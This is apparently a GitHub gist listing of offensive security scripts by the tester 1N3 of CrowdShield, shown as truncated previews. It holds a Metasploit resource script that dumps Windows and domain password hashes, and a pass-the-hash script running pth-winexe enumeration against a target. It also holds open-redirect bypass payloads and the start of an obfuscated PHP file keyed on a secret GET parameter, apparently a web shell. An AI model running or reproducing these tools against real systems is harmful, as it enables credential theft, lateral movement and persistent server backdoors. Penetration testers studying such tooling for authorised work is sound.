This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# crt.sh sub-domain check by 1N3@CrowdShield | |
# https://crowdshield.com | |
# | |
OKBLUE='\033[94m' | |
OKRED='\033[91m' | |
OKGREEN='\033[92m' | |
OKORANGE='\033[93m' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# | |
# `7MN. `7MF' | |
# __, MMN. M | |
#`7MM M YMb M pd""b. | |
# MM M `MN. M (O) `8b | |
# MM M `MM.M ,89 | |
# MM M YMM ""Yb. | |
#.JMML..JML. YM 88 | |
# (O) .M' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (isset ($_GET['lU$6AJp0aXFt0RyAynP9OnL7FlzQ'])) | |
{ | |
$a1="Fil"; | |
$c1="#d"; | |
$c2="f5"; | |
$color = $c1.$c2; | |
$bs="esM"; | |
$da="an"; | |
$default_action = $a1.$bs.$da; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
____ | |
_________ / _/___ ___ _____ | |
/ ___/ __ \ / // __ \/ _ \/ ___/ | |
(__ ) / / // // /_/ / __/ / | |
/____/_/ /_/___/ .___/\___/_/ | |
/_/ | |
+ -- --=[http://crowdshield.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
setg SESSION 1 | |
use post/windows/gather/smart_hashdump | |
run | |
use post/windows/gather/credentials/domain_hashdump | |
run | |
use post/windows/gather/credentials/mcafee_vse_hashdump | |
run | |
use post/windows/gather/credentials/mssql_local_hashdump | |
run | |
use post/windows/gather/hashdump |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# + -- --=[Sn1per by 1N3@CrowdShield | |
# + -- --=[http://crowdshield.com | |
# | |
VER="4.4" | |
BROWSER="firefox" # SET DEFAULT BROWSER | |
INSTALL_DIR="/usr/share/sniper" | |
PLUGINS_DIR="/usr/share/sniper/plugins" | |
CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
TARGET=$1 | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://google.com | |
//google.com | |
\\google.com | |
\/google.com | |
\/\/google.com | |
/\google.com | |
/\/\google.com | |
|/google.com | |
/%09/google.com | |
/google.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
REVERSE ENGINEERING CRITICAL WORDPRESS 0day EXPLOIT | |
This past weekend, I noticed an interesting alert from my mod_security logs for a request being made to my Wordpress site. Although the request was un-successful, I decided to dig deeper to understand what this was request was actually trying to do. After time, I've concluded that this is possibly a new 0day exploit attempt against Wordpress or a related Wordpress plugin (iThemes Security??). I'm still trying to uncover the exact flaw being exploited here so if anyone has any further details, feel free to contact me at 1N3@hushmail.com or twitter @CrowdShield. | |
ORIGINAL MOD-SECURITY REUQUEST | |
==> /var/log/apache2/error.log <== | |
[Sat Aug 15 19:00:10 2015] [error] [client 46.148.18.226] ModSecurity: Warning. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Enumer8 by 1N3 v20150705 | |
# http://crowdshield.com | |
# | |
TARGET="$1" | |
LHOST="192.168.1.132" | |
LOOT_DIR="/pentest/loot" | |
FINDSPLOIT_DIR="/pentest/findsploit" | |
KEY_PATH="/pentest/linux/ssh/dsa/1024" |
NewerOlder